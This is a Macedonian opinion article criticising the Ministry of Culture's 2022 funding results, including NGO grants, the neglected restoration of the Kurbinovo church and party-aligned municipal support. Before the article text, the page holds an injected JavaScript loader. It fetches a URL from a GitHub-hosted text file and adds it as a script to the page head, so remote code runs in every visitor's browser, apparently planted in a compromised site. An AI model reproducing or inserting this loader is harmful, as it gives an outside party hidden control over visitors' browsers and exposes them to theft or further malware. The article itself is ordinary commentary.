;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); За резултатите од годишната програма на Министерството за култура на проекти од (не)национален интерес - Антропол
АктуелноЛокално

За резултатите од годишната програма на Министерството за култура на проекти од (не)национален интерес

  • Пишува проф. д-р Панче Велков, член на Левица – Сектор култура.

Пред неколку дена Министерството за култура ги објави резултатите од минатогодишниот конкурс за проекти од областа на културата за 2022 година.

Изборот на подржаните проекти, а уште повеќе и износот на додолените средства за имплементација на избраните проекти во објавената програма јасно укажува на тоа како Министерството го артикулира и го штити националниот интерес на македонската држава во областа на културата. Она што прво паѓа во очи е фактот што ни во оваа програма Министерството за култура не успеа да направи разграничување во финансирањетто на програмите на државните национални институции од проектите на невалдиниот, таканаречен независен граѓански сектор. Оваа пракса, наследена од поранешна Југославија, не се менува и продолжува и ден денес.

Но, за разлика од поранешниот систем каде националните институции во културата имаа апсолутен приорет во државното финансирање, сега невладиниот сектор прибира над 40% од вкупните средства кои државата ги издвојува за културата, и тој всушност го одразува и покажува националниот интерес на државата. Така, оваа државна политика води кон една апсурдна и контрадикторна ситуација – секторот кој што треба да е независен т.е. кој што по дефениција ја претставува слободната независна сцена во културата сега добива огромна подршка од државата, тој од неа станува зависен и е тој кој вусшност сега го претставува и брани државниот интерес во културата. Со други, зборови се става во негова служба! Државните институции за сметка на тоа, се оставени да кубурат со она што останало од владиниот колач и да се снаоѓаат како знаат и умеат.

Оваа ситуцаија е причина повеќе, како сектор за култура, од блиску да ги разгледаме подржаните проекти и организации од невлданниот сектор во програмата на Министерството за култура. Така на пример, во делот за заштита на културното наследство се појавува Друштвото за издавачка дејност, трговија и услуги ЗОЈДЕР на кој му е доделен проект за „Анализа на средновековните градителски системи и реставрација на византиските цркви“.

За ЗОЈДЕР не постајат никакви информции на интернет, кои би ни укажале со што заслужил да се занимава со ваква комплексна и важна тема и за тоа да добие подршка од државата и да го преставува и штити нејзиниот национален инетерес. Од друга страна факт е дека за реставрација на црквата Свети Ѓорѓи во Курбиново, што е всушност истата тема, Министерството на надлежната институција Музеј и Завод – Битола во овогодишната програма и доделило над 9 милиони денари, што е секако за поздравување, но само на прв поглед. Всушност, црквата се реставрира веќе цели 10 години, а оваа зима е оставена без ќерамиди со привремен покрив кој е поставен во далечната 2013 година! Надлежната институвија од Битола која го води (или подобро кажано, не го води) Проектот веќе три години не назначува раководител, а од друга страна се противи на било каква надворешна интервенција и помош.

Министерството за култура минатата година ја одби понудената техничка помош и грант од 100 илјади евра од страна на германската влада за учество и помош во реализација на конзервацијата на овој наш најважен споменик на културата, иако за тој ист проект токму Mинистерството за култура имаше потпишано договор за соработка на владино ниво со Германската амбасада. Сега истата таа гарнитура која ја дотера црквата до ова дереџе ќе продолжи да се грижи за курбиновската црква и тоа со поголем буџет, но овој пат наместо да работи со врвни конзерватори од Германија, ќе ги следи препораките на Друштвото за трговија ЗОЈДЕР.

За жал, оваа тажна историја во македонската култура реалност не е изолиран случај. Програмата од национален интерес кажува многу за македонските состојби. Во делот за интердисциплинарни проекти фигурира цела дузина на проекти со слични наслови кои малку или баш ништо не кажуваат, освен тоа дека се… интердисциплинарни. Колку за илустрација – на правниот субјект „Социокултурен простор од Тетово“, му е доделен проект – Интердисциплинарен проект за контемпорирана урбанистичка интервенција и уметност како заедничка практика. Што треба ова да претставува и каде е овде националниот интерес? Што преставува денес еден интердисциплинарен проект во културата? Зар заштитата на курбиновската црква не е интердисциплинарен проект? Сметеме дека сите современи проекти во културата се или барем треба да бидат интердисциплинарни.

Да не зборуваме пак за дневната политика, која неизбежно си наоѓа свое место во Програмата. Министерството подржува проекти на локакно ниво т.е. општини, но само на оние каде што градоначелнците се од редовите на партиите на власт, СДСМ и ДУИ, како што се општините на Крива Паланка, на Делчево и на Кичево. Тука бар сѐ е јасно – проектите од другите општини кои се водени од опозицијата не се од национален интерес за Министерството за култура…

Оваа програма има сепак една добра страна – таа веројатно најјасно го илустрирара недостатокот на визија на Државата за тоа како треба да се развива македонската култура, кој и што во таа визија треба да има приоритет. А со застарен приод и без современа визија, не може да се има ни ефикасна стратегија за реализација на поставените цел, за што јасно зборуваат горенаведнените примери.